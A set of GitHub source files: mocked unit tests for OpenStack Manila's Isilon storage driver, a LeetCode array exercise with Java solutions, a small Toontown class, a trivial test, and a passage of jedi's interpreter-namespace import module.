"content_hash": "f0aa4849764f04f7d861bd8bc3451ba8",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 119,
"avg_line_length": 30.403225806451612,
"alnum_prop": 0.6095490716180372,
"repo_name": "torbjoernk/pySDC",
"id": "047f8977bfa01d4f276412ad12957aba97c378aa",
"size": "1885",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/penningtrap/TransferClass.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "279755"
}
],
"symlink_target": ""
}
|
import ddt
import mock
from oslo_log import log
from oslo_utils import units
import six
from manila.common import constants as const
from manila import exception
from manila.share.drivers.dell_emc.plugins.isilon import isilon
from manila.share.drivers.dell_emc.plugins.isilon import isilon_api
from manila import test
LOG = log.getLogger(__name__)
@ddt.ddt
class IsilonTest(test.TestCase):
"""Integration test for the Isilon Manila driver."""
ISILON_ADDR = '10.0.0.1'
API_URL = 'https://%s:8080' % ISILON_ADDR
AUTH = ('admin', 'admin')
ROOT_DIR = '/ifs/manila-test'
SHARE_NAME = 'share-foo'
SHARE_DIR = ROOT_DIR + '/' + SHARE_NAME
ADMIN_HOME_DIR = '/ifs/home/admin'
CLONE_DIR = ROOT_DIR + '/clone-dir'
class MockConfig(object):
def safe_get(self, value):
if value == 'emc_nas_server':
return '10.0.0.1'
elif value == 'emc_nas_server_port':
return '8080'
elif value == 'emc_nas_login':
return 'admin'
elif value == 'emc_nas_password':
return 'a'
elif value == 'emc_nas_root_dir':
return '/ifs/manila-test'
else:
return None
@mock.patch(
'manila.share.drivers.dell_emc.plugins.isilon.isilon.isilon_api.'
'IsilonApi',
autospec=True)
def setUp(self, mock_isi_api):
super(IsilonTest, self).setUp()
self._mock_isilon_api = mock_isi_api.return_value
self.storage_connection = isilon.IsilonStorageConnection(LOG)
self.mock_context = mock.Mock('Context')
self.mock_emc_driver = mock.Mock('EmcDriver')
self.mock_emc_driver.attach_mock(self.MockConfig(), 'configuration')
self.storage_connection.connect(
self.mock_emc_driver, self.mock_context)
def test_allow_access_single_ip_nfs(self):
# setup
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.1.1.10',
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
fake_export_id = 1
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
self._mock_isilon_api.get_nfs_export.return_value = {
'clients': []}
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
self.storage_connection.allow_access(self.mock_context, share, access,
share_server)
# verify expected REST API call is executed
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
str(fake_export_id))
expected_data = {'clients': ['10.1.1.10']}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
def test_allow_access_with_nfs_readonly(self):
# setup
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.1.1.10',
'access_level': const.ACCESS_LEVEL_RO}
fake_export_id = 70
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
self._mock_isilon_api.get_nfs_export.return_value = {
'read_only_clients': []}
self.assertFalse(self._mock_isilon_api.request.called)
self.storage_connection.allow_access(
self.mock_context, share, access, None)
# verify expected REST API call is executed
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
six.text_type(fake_export_id))
expected_data = {'read_only_clients': ['10.1.1.10']}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
def test_allow_access_with_nfs_readwrite(self):
# setup
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.1.1.10',
'access_level': const.ACCESS_LEVEL_RW}
fake_export_id = 70
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
self._mock_isilon_api.get_nfs_export.return_value = {
'clients': []}
self.assertFalse(self._mock_isilon_api.request.called)
self.storage_connection.allow_access(
self.mock_context, share, access, None)
# verify expected REST API call is executed
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
six.text_type(fake_export_id))
expected_data = {'clients': ['10.1.1.10']}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
def test_allow_access_with_cifs_ip_readonly(self):
# Note: Driver does not currently support readonly access for "ip" type
share = {'name': self.SHARE_NAME, 'share_proto': 'CIFS'}
access = {'access_type': 'ip', 'access_to': '10.1.1.10',
'access_level': const.ACCESS_LEVEL_RO}
self.assertRaises(
exception.InvalidShareAccess, self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_deny_access__ip_nfs_readwrite(self):
"""Verifies that an IP will be remove from a whitelist."""
fake_export_id = 1
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
# simulate an IP added to the whitelist
ip_addr = '10.0.0.4'
self._mock_isilon_api.get_nfs_export.return_value = {
'clients': [ip_addr]}
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': ip_addr,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
# call method under test
self.assertFalse(self._mock_isilon_api.request.called)
self.storage_connection.deny_access(self.mock_context, share, access,
share_server)
# verify that a call is made to remove an existing IP from the list
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
str(fake_export_id))
expected_data = {'clients': []}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data
)
def test_deny_access__nfs_ip_readonly(self):
fake_export_id = 1
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
# simulate an IP added to the whitelist
ip_addr = '10.0.0.4'
self._mock_isilon_api.get_nfs_export.return_value = {
'read_only_clients': [ip_addr]}
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': ip_addr,
'access_level': const.ACCESS_LEVEL_RO}
share_server = None
# call method under test
self.assertFalse(self._mock_isilon_api.request.called)
self.storage_connection.deny_access(self.mock_context, share, access,
share_server)
# verify that a call is made to remove an existing IP from the list
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
six.text_type(fake_export_id))
expected_data = {'read_only_clients': []}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data
)
def test_deny_access_ip_cifs(self):
"""Verifies that an IP will be remove from a whitelist.
Precondition: the IP to be removed exists in the whitelist. Otherwise,
do nothing.
"""
# setup
ip_addr = '10.1.1.10'
share = {'name': self.SHARE_NAME, 'share_proto': 'CIFS'}
self._mock_isilon_api.lookup_smb_share.return_value = {
'host_acl': ['allow:' + ip_addr]}
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
access = {'access_type': 'ip', 'access_to': ip_addr,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
self.storage_connection.deny_access(self.mock_context, share, access,
share_server)
# verify API call is made to remove IP is removed from whitelist
expected_url = (self.API_URL + '/platform/1/protocols/smb/shares/' +
self.SHARE_NAME)
expected_data = {'host_acl': []}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
def test_deny_access_nfs_invalid_access_type(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'foo_access_type', 'access_to': '10.0.0.1'}
# This operation should return silently
self.storage_connection.deny_access(
self.mock_context, share, access, None)
def test_deny_access_cifs_invalid_access_type(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'CIFS'}
access = {'access_type': 'foo_access_type', 'access_to': '10.0.0.1'}
# This operation should return silently
self.storage_connection.deny_access(self.mock_context, share, access,
None)
def test_deny_access_invalid_share_protocol(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'FOO'}
access = {'access_type': 'ip', 'access_to': '10.0.0.1',
'access_level': const.ACCESS_LEVEL_RW}
# This operation should return silently
self.storage_connection.deny_access(
self.mock_context, share, access, None)
def test_deny_access_nfs_export_does_not_exist(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.0.0.1',
'access_level': const.ACCESS_LEVEL_RW}
self._mock_isilon_api.lookup_nfs_export.return_value = 1
self._mock_isilon_api.get_nfs_export.return_value = None
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.deny_access,
self.mock_context, share, access, None
)
def test_deny_access_nfs_share_does_not_exist(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': '10.0.0.1',
'access_level': const.ACCESS_LEVEL_RW}
self._mock_isilon_api.lookup_nfs_export.return_value = None
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.deny_access,
self.mock_context, share, access, None)
def test_deny_access_nfs_share_does_not_contain_required_key(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {
'access_type': 'ip',
'access_to': '10.0.0.1',
'access_level': const.ACCESS_LEVEL_RW,
}
self._mock_isilon_api.get_nfs_export.return_value = {}
self.assertRaises(exception.ShareBackendException,
self.storage_connection.deny_access,
self.mock_context, share, access, None)
def test_allow_access_multiple_ip_nfs(self):
"""Verifies adding an IP to a whitelist with pre-existing ips.
Verifies that when adding an additional IP to a whitelist which already
contains IPs, the Isilon driver successfully appends the IP to the
whitelist.
"""
# setup
fake_export_id = 42
new_allowed_ip = '10.7.7.8'
self._mock_isilon_api.lookup_nfs_export.return_value = fake_export_id
existing_ips = ['10.0.0.1', '10.1.1.1', '10.0.0.2']
export_json = {
'clients': existing_ips,
'access_level': const.ACCESS_LEVEL_RW,
}
self._mock_isilon_api.get_nfs_export.return_value = export_json
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
share = {'name': self.SHARE_NAME, 'share_proto': 'NFS'}
access = {'access_type': 'ip', 'access_to': new_allowed_ip,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
self.storage_connection.allow_access(
self.mock_context, share, access, share_server)
# verify access rule is applied
expected_url = (self.API_URL + '/platform/1/protocols/nfs/exports/' +
str(fake_export_id))
self.assertTrue(self._mock_isilon_api.request.called)
args, kwargs = self._mock_isilon_api.request.call_args
action, url = args
self.assertEqual('PUT', action)
self.assertEqual(expected_url, url)
self.assertEqual(1, len(kwargs))
self.assertIn('data', kwargs)
actual_clients = set(kwargs['data']['clients'])
expected_clients = set(existing_ips)
expected_clients.add(new_allowed_ip)
self.assertEqual(expected_clients, actual_clients)
def test_allow_access_multiple_ip_cifs(self):
"""Verifies adding an IP to a whitelist with pre-existing ips.
Verifies that when adding an additional IP to a whitelist which already
contains IPs, the Isilon driver successfully appends the IP to the
whitelist.
"""
# setup
share_name = self.SHARE_NAME
new_allowed_ip = '10.101.1.1'
existing_ips = ['allow:10.0.0.1', 'allow:10.1.1.1', 'allow:10.0.0.2']
share_json = {'name': share_name, 'host_acl': existing_ips}
self._mock_isilon_api.lookup_smb_share.return_value = share_json
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
share = {'name': share_name, 'share_proto': 'CIFS'}
access = {'access_type': 'ip', 'access_to': new_allowed_ip,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
self.storage_connection.allow_access(self.mock_context, share,
access,
share_server)
# verify access rule is applied
expected_url = (self.API_URL + '/platform/1/protocols/smb/shares/' +
share_name)
self.assertTrue(self._mock_isilon_api.request.called)
args, kwargs = self._mock_isilon_api.request.call_args
action, url = args
self.assertEqual('PUT', action)
self.assertEqual(expected_url, url)
self.assertEqual(1, len(kwargs))
self.assertIn('data', kwargs)
actual_clients = set(kwargs['data']['host_acl'])
expected_clients = set(existing_ips)
expected_clients.add('allow:' + new_allowed_ip)
self.assertEqual(expected_clients, actual_clients)
def test_allow_access_single_ip_cifs(self):
# setup
share_name = self.SHARE_NAME
share = {'name': share_name, 'share_proto': 'CIFS'}
allow_ip = '10.1.1.10'
access = {'access_type': 'ip', 'access_to': allow_ip,
'access_level': const.ACCESS_LEVEL_RW}
share_server = None
self._mock_isilon_api.lookup_smb_share.return_value = {
'name': share_name, 'host_acl': []}
self.assertFalse(self._mock_isilon_api.request.called)
# call method under test
self.storage_connection.allow_access(self.mock_context, share, access,
share_server)
# verify access rule is applied
expected_url = (self.API_URL + '/platform/1/protocols/smb/shares/' +
self.SHARE_NAME)
expected_data = {'host_acl': ['allow:' + allow_ip]}
self._mock_isilon_api.request.assert_called_once_with(
'PUT', expected_url, data=expected_data)
@ddt.data(
('foo', const.ACCESS_LEVEL_RW, isilon_api.SmbPermission.rw),
('testuser', const.ACCESS_LEVEL_RO, isilon_api.SmbPermission.ro),
)
def test_allow_access_with_cifs_user(self, data):
# setup
share_name = self.SHARE_NAME
user, access_level, expected_smb_perm = data
share = {'name': share_name, 'share_proto': 'CIFS'}
access = {'access_type': 'user',
'access_to': user,
'access_level': access_level}
self.storage_connection.allow_access(self.mock_context, share,
access, None)
self._mock_isilon_api.smb_permissions_add.assert_called_once_with(
share_name, user, expected_smb_perm)
def test_allow_access_with_cifs_user_invalid_access_level(self):
share = {'name': self.SHARE_NAME, 'share_proto': 'CIFS'}
access = {
'access_type': 'user',
'access_to': 'foo',
'access_level': 'everything',
}
self.assertRaises(exception.InvalidShareAccess,
self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_allow_access_with_cifs_invalid_access_type(self):
share_name = self.SHARE_NAME
share = {'name': share_name, 'share_proto': 'CIFS'}
access = {'access_type': 'fooaccesstype',
'access_to': 'testuser',
'access_level': const.ACCESS_LEVEL_RW}
self.assertRaises(exception.InvalidShareAccess,
self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_deny_access_with_cifs_user(self):
share_name = self.SHARE_NAME
user_to_remove = 'testuser'
share = {'name': share_name, 'share_proto': 'CIFS'}
access = {'access_type': 'user',
'access_to': user_to_remove,
'access_level': const.ACCESS_LEVEL_RW}
self.assertFalse(self._mock_isilon_api.smb_permissions_remove.called)
self.storage_connection.deny_access(self.mock_context, share, access,
None)
self._mock_isilon_api.smb_permissions_remove.assert_called_with(
share_name, user_to_remove)
def test_allow_access_invalid_access_type(self):
# setup
share_name = self.SHARE_NAME
share = {'name': share_name, 'share_proto': 'NFS'}
allow_ip = '10.1.1.10'
access = {'access_type': 'foo_access_type', 'access_to': allow_ip}
# verify method under test throws the expected exception
self.assertRaises(
exception.InvalidShareAccess,
self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_allow_access_invalid_share_protocol(self):
# setup
share_name = self.SHARE_NAME
share = {'name': share_name, 'share_proto': 'FOO_PROTOCOL'}
allow_ip = '10.1.1.10'
access = {'access_type': 'ip', 'access_to': allow_ip}
# verify method under test throws the expected exception
self.assertRaises(
exception.InvalidShare, self.storage_connection.allow_access,
self.mock_context, share, access, None)
def test_create_share_nfs(self):
share_path = self.SHARE_DIR
self.assertFalse(self._mock_isilon_api.create_directory.called)
self.assertFalse(self._mock_isilon_api.create_nfs_export.called)
# create the share
share = {"name": self.SHARE_NAME, "share_proto": 'NFS', "size": 8}
location = self.storage_connection.create_share(self.mock_context,
share, None)
# verify location and API call made
expected_location = '%s:%s' % (self.ISILON_ADDR, self.SHARE_DIR)
self.assertEqual(expected_location, location)
self._mock_isilon_api.create_directory.assert_called_with(share_path)
self._mock_isilon_api.create_nfs_export.assert_called_with(share_path)
# verify directory quota call made
self._mock_isilon_api.quota_create.assert_called_with(
share_path, 'directory', 8 * units.Gi)
def test_create_share_cifs(self):
self.assertFalse(self._mock_isilon_api.create_directory.called)
self.assertFalse(self._mock_isilon_api.create_smb_share.called)
# create the share
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS', "size": 8}
location = self.storage_connection.create_share(self.mock_context,
share, None)
expected_location = '\\\\{0}\\{1}'.format(
self.ISILON_ADDR, self.SHARE_NAME)
self.assertEqual(expected_location, location)
self._mock_isilon_api.create_directory.assert_called_once_with(
self.SHARE_DIR)
self._mock_isilon_api.create_smb_share.assert_called_once_with(
self.SHARE_NAME, self.SHARE_DIR)
# verify directory quota call made
self._mock_isilon_api.quota_create.assert_called_with(
self.SHARE_DIR, 'directory', 8 * units.Gi)
def test_create_share_invalid_share_protocol(self):
share = {"name": self.SHARE_NAME, "share_proto": 'FOO_PROTOCOL'}
self.assertRaises(
exception.InvalidShare, self.storage_connection.create_share,
self.mock_context, share, share_server=None)
def test_create_share_nfs_backend_failure(self):
share = {"name": self.SHARE_NAME, "share_proto": 'NFS'}
self._mock_isilon_api.create_nfs_export.return_value = False
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.create_share,
self.mock_context, share, share_server=None)
def test_create_snapshot(self):
# create snapshot
snapshot_name = "snapshot01"
snapshot_path = '/ifs/home/admin'
snapshot = {'name': snapshot_name, 'share_name': snapshot_path}
self.storage_connection.create_snapshot(self.mock_context, snapshot,
None)
# verify the create snapshot API call is executed
self._mock_isilon_api.create_snapshot.assert_called_with(snapshot_name,
snapshot_path)
def test_create_share_from_snapshot_nfs(self):
# assertions
self.assertFalse(self._mock_isilon_api.create_nfs_export.called)
self.assertFalse(self._mock_isilon_api.clone_snapshot.called)
snapshot_name = "snapshot01"
snapshot_path = '/ifs/home/admin'
# execute method under test
snapshot = {'name': snapshot_name, 'share_name': snapshot_path}
share = {"name": self.SHARE_NAME, "share_proto": 'NFS', 'size': 5}
location = self.storage_connection.create_share_from_snapshot(
self.mock_context, share, snapshot, None)
# verify NFS export created at expected location
self._mock_isilon_api.create_nfs_export.assert_called_with(
self.SHARE_DIR)
# verify clone_directory(container_path) method called
self._mock_isilon_api.clone_snapshot.assert_called_once_with(
snapshot_name, self.SHARE_DIR)
expected_location = '{0}:{1}'.format(
self.ISILON_ADDR, self.SHARE_DIR)
self.assertEqual(expected_location, location)
# verify directory quota call made
self._mock_isilon_api.quota_create.assert_called_with(
self.SHARE_DIR, 'directory', 5 * units.Gi)
def test_create_share_from_snapshot_cifs(self):
# assertions
self.assertFalse(self._mock_isilon_api.create_smb_share.called)
self.assertFalse(self._mock_isilon_api.clone_snapshot.called)
# setup
snapshot_name = "snapshot01"
snapshot_path = '/ifs/home/admin'
new_share_name = 'clone-dir'
# execute method under test
snapshot = {'name': snapshot_name, 'share_name': snapshot_path}
share = {"name": new_share_name, "share_proto": 'CIFS', "size": 2}
location = self.storage_connection.create_share_from_snapshot(
self.mock_context, share, snapshot, None)
# verify call made to create new CIFS share
self._mock_isilon_api.create_smb_share.assert_called_once_with(
new_share_name, self.CLONE_DIR)
self._mock_isilon_api.clone_snapshot.assert_called_once_with(
snapshot_name, self.CLONE_DIR)
expected_location = '\\\\{0}\\{1}'.format(self.ISILON_ADDR,
new_share_name)
self.assertEqual(expected_location, location)
# verify directory quota call made
expected_share_path = '{0}/{1}'.format(self.ROOT_DIR, new_share_name)
self._mock_isilon_api.quota_create.assert_called_with(
expected_share_path, 'directory', 2 * units.Gi)
def test_delete_share_nfs(self):
share = {"name": self.SHARE_NAME, "share_proto": 'NFS'}
fake_share_num = 42
self._mock_isilon_api.lookup_nfs_export.return_value = fake_share_num
self.assertFalse(self._mock_isilon_api.delete_nfs_share.called)
# delete the share
self.storage_connection.delete_share(self.mock_context, share, None)
# verify share delete
self._mock_isilon_api.delete_nfs_share.assert_called_with(
fake_share_num)
def test_delete_share_cifs(self):
self.assertFalse(self._mock_isilon_api.delete_smb_share.called)
# delete the share
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS'}
self.storage_connection.delete_share(self.mock_context, share, None)
# verify share deleted
self._mock_isilon_api.delete_smb_share.assert_called_with(
self.SHARE_NAME)
def test_delete_share_invalid_share_proto(self):
share = {"name": self.SHARE_NAME, "share_proto": 'FOO_PROTOCOL'}
self.assertRaises(
exception.InvalidShare, self.storage_connection.delete_share,
self.mock_context, share, None
)
def test_delete_nfs_share_backend_failure(self):
share = {"name": self.SHARE_NAME, "share_proto": 'NFS'}
self._mock_isilon_api.delete_nfs_share.return_value = False
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.delete_share,
self.mock_context, share, None
)
def test_delete_nfs_share_share_does_not_exist(self):
self._mock_isilon_api.lookup_nfs_export.return_value = None
share = {"name": self.SHARE_NAME, "share_proto": 'NFS'}
# verify the calling delete on a non-existent share returns and does
# not throw exception
self.storage_connection.delete_share(self.mock_context, share, None)
def test_delete_cifs_share_backend_failure(self):
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS'}
self._mock_isilon_api.delete_smb_share.return_value = False
self.assertRaises(
exception.ShareBackendException,
self.storage_connection.delete_share,
self.mock_context, share, None
)
def test_delete_cifs_share_share_does_not_exist(self):
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS'}
self._mock_isilon_api.lookup_smb_share.return_value = None
# verify the calling delete on a non-existent share returns and does
# not throw exception
self.storage_connection.delete_share(self.mock_context, share, None)
def test_delete_snapshot(self):
# create a snapshot
snapshot_name = "snapshot01"
snapshot_path = '/ifs/home/admin'
snapshot = {'name': snapshot_name, 'share_name': snapshot_path}
self.assertFalse(self._mock_isilon_api.delete_snapshot.called)
# delete the created snapshot
self.storage_connection.delete_snapshot(self.mock_context, snapshot,
None)
# verify the API call was made to delete the snapshot
self._mock_isilon_api.delete_snapshot.assert_called_once_with(
snapshot_name)
def test_ensure_share(self):
share = {"name": self.SHARE_NAME, "share_proto": 'CIFS'}
self.storage_connection.ensure_share(self.mock_context, share, None)
@mock.patch(
'manila.share.drivers.dell_emc.plugins.isilon.isilon.isilon_api.'
'IsilonApi',
autospec=True)
def test_connect(self, mock_isi_api):
storage_connection = isilon.IsilonStorageConnection(LOG)
# execute method under test
storage_connection.connect(
self.mock_emc_driver, self.mock_context)
# verify connect sets driver params appropriately
mock_config = self.MockConfig()
server_addr = mock_config.safe_get('emc_nas_server')
self.assertEqual(server_addr, storage_connection._server)
expected_port = int(mock_config.safe_get('emc_nas_server_port'))
self.assertEqual(expected_port, storage_connection._port)
self.assertEqual('https://{0}:{1}'.format(server_addr, expected_port),
storage_connection._server_url)
expected_username = mock_config.safe_get('emc_nas_login')
self.assertEqual(expected_username, storage_connection._username)
expected_password = mock_config.safe_get('emc_nas_password')
self.assertEqual(expected_password, storage_connection._password)
self.assertFalse(storage_connection._verify_ssl_cert)
@mock.patch(
'manila.share.drivers.dell_emc.plugins.isilon.isilon.isilon_api.'
'IsilonApi',
autospec=True)
def test_connect_root_dir_does_not_exist(self, mock_isi_api):
mock_isilon_api = mock_isi_api.return_value
mock_isilon_api.is_path_existent.return_value = False
storage_connection = isilon.IsilonStorageConnection(LOG)
# call method under test
storage_connection.connect(self.mock_emc_driver, self.mock_context)
mock_isilon_api.create_directory.assert_called_once_with(
self.ROOT_DIR, recursive=True)
def test_update_share_stats(self):
stats_dict = {}
self.storage_connection.update_share_stats(stats_dict)
expected_version = isilon.VERSION
self.assertEqual({'driver_version': expected_version}, stats_dict)
def test_get_network_allocations_number(self):
# call method under test
num = self.storage_connection.get_network_allocations_number()
self.assertEqual(0, num)
def test_extend_share(self):
quota_id = 'abcdef'
new_share_size = 8
share = {
"name": self.SHARE_NAME,
"share_proto": 'NFS',
"size": new_share_size
}
self._mock_isilon_api.quota_get.return_value = {'id': quota_id}
self.assertFalse(self._mock_isilon_api.quota_set.called)
self.storage_connection.extend_share(share, new_share_size)
share_path = '{0}/{1}'.format(self.ROOT_DIR, self.SHARE_NAME)
expected_quota_size = new_share_size * units.Gi
self._mock_isilon_api.quota_set.assert_called_once_with(
share_path, 'directory', expected_quota_size)
|
{
"content_hash": "dd0c09ce84abed046a9a530424813af5",
"timestamp": "",
"source": "github",
"line_count": 751,
"max_line_length": 79,
"avg_line_length": 42.271637816245004,
"alnum_prop": 0.601083601083601,
"repo_name": "vponomaryov/manila",
"id": "777a18bc60a24cb71e604790c6adf5070ff3eccd",
"size": "32350",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manila/tests/share/drivers/dell_emc/plugins/isilon/test_isilon.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "953"
},
{
"name": "Python",
"bytes": "9697997"
},
{
"name": "Shell",
"bytes": "103800"
}
],
"symlink_target": ""
}
|
__source__ = 'https://leetcode.com/problems/non-decreasing-array/'
# Time: O(N)
# Space: O(1)
#
# Description: Leetcode # 665. Non-decreasing Array
#
# Given an array with n integers,
# your task is to check if it could become non-decreasing by modifying at most 1 element.
#
# We define an array is non-decreasing if array[i] <= array[i + 1] holds for every i (1 <= i < n).
#
# Example 1:
# Input: [4,2,3]
# Output: True
# Explanation: You could modify the first
# 4
# to
# 1
# to get a non-decreasing array.
# Example 2:
# Input: [4,2,1]
# Output: False
# Explanation: You can't get a non-decreasing array by modify at most one element.
# Note: The n belongs to [1, 10,000].
# Companies
# Google
# Related Topics
# Array
#
import unittest
class Solution(object):
pass # your function here
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/non-decreasing-array/solution/
# 9ms 99.39%
class Solution {
public boolean checkPossibility(int[] nums) {
int cnt = 0; //the number of changes
for(int i = 1; i < nums.length && cnt<=1 ; i++){
if(nums[i-1] > nums[i]){
cnt++;
if(i-2<0 || nums[i-2] <= nums[i])nums[i-1] = nums[i]; //modify nums[i-1] of a priority
else nums[i] = nums[i-1]; //have to modify nums[i]
}
}
return cnt<=1;
}
}
# 10ms 89.96%
class Solution {
public boolean checkPossibility(int[] nums) {
if(nums == null || nums.length < 2)
return true;
boolean change = true;
int start = 0;
int last = nums[start];
start = 1;
while(start < nums.length){
int current = nums[start];
if (last <= current){
last = current;
start++;
continue;
}
if(change){
if(start-2 < 0 || current > nums[start - 2])
last = current;
change = false;
start++;
}
else
return false;
}
return true;
}
}
'''
|
{
"content_hash": "a27f22b4a51c981666632cb364b45a8f",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 103,
"avg_line_length": 25.224719101123597,
"alnum_prop": 0.5363028953229398,
"repo_name": "JulyKikuAkita/PythonPrac",
"id": "2cf80b74bcd6f8775c9a89b38e7db2440b75400b",
"size": "2245",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cs15211/Non-decreasingArray.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "DIGITAL Command Language",
"bytes": "191608"
},
{
"name": "HTML",
"bytes": "647778"
},
{
"name": "Python",
"bytes": "5429558"
}
],
"symlink_target": ""
}
|
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedObject
from otp.distributed import DistributedDistrict
class ToontownDistrict(DistributedDistrict.DistributedDistrict):
notify = DirectNotifyGlobal.directNotify.newCategory('ToontownDistrict')
def __init__(self, cr):
DistributedDistrict.DistributedDistrict.__init__(self, cr)
self.avatarCount = 0
self.newAvatarCount = 0
def allowAHNNLog(self, allow):
self.allowAHNN = allow
def getAllowAHNNLog(self):
return self.allowAHNN
|
{
"content_hash": "66d1ae22f32781f331acf2b151d2189b",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 76,
"avg_line_length": 33.94117647058823,
"alnum_prop": 0.7521663778162911,
"repo_name": "ksmit799/Toontown-Source",
"id": "830e473680a2bd6df498d9fba8b357c0fe43449d",
"size": "577",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "toontown/distributed/ToontownDistrict.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1441"
},
{
"name": "PLSQL",
"bytes": "901"
},
{
"name": "Python",
"bytes": "15617225"
},
{
"name": "Shell",
"bytes": "182"
}
],
"symlink_target": ""
}
|
def test_simple():
import kanten
|
{
"content_hash": "a3e95d2b486a02b7f03670551c3d11c4",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 18,
"avg_line_length": 9.75,
"alnum_prop": 0.6410256410256411,
"repo_name": "ivanov/kanten",
"id": "084af8693f288a7c65f77be948363353deee69f4",
"size": "39",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test_kanten.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "467"
},
{
"name": "Python",
"bytes": "33048"
}
],
"symlink_target": ""
}
|
"""
Module to handle interpreted Python objects.
"""
import itertools
import tokenize
from jedi.parser import representation as pr
class ObjectImporter(object):
"""
Import objects in "raw" namespace such as :func:`locals`.
"""
def __init__(self, scope):
self.scope = scope
count = itertools.count()
self._genname = lambda: '*jedi-%s*' % next(count)
"""
Generate unique variable names to avoid name collision.
To avoid name collision to already defined names, generated
names are invalid as Python identifier.
"""
def import_raw_namespace(self, raw_namespace):
"""
Import interpreted Python objects in a namespace.
Three kinds of objects are treated here.
1. Functions and classes. The objects imported like this::
from os.path import join
2. Modules. The objects imported like this::
import os
3. Instances. The objects created like this::
from datetime import datetime
dt = datetime(2013, 1, 1)
:type raw_namespace: dict
:arg raw_namespace: e.g., the dict given by `locals`
"""
scope = self.scope
for (variable, obj) in raw_namespace.items():
objname = getattr(obj, '__name__', None)
# Import functions and classes
module = getattr(obj, '__module__', None)
if module and objname:
fakeimport = self.make_fakeimport(module, objname, variable)
scope.add_import(fakeimport)
continue
# Import modules
if getattr(obj, '__file__', None) and objname:
fakeimport = self.make_fakeimport(objname)
scope.add_import(fakeimport)
continue
# Import instances
objclass = getattr(obj, '__class__', None)
module = getattr(objclass, '__module__', None)
if objclass and module:
alias = self._genname()
fakeimport = self.make_fakeimport(module, objclass.__name__,
alias)
fakestmt = self.make_fakestatement(variable, alias, call=True)
scope.add_import(fakeimport)
scope.add_statement(fakestmt)
continue
def make_fakeimport(self, module, variable=None, alias=None):
"""
Make a fake import object.
The following statements are created depending on what parameters
are given:
- only `module`: ``import <module>``
- `module` and `variable`: ``from <module> import <variable>``
- all: ``from <module> import <variable> as <alias>``
:type module: str
:arg module: ``<module>`` part in ``from <module> import ...``
:type variable: str
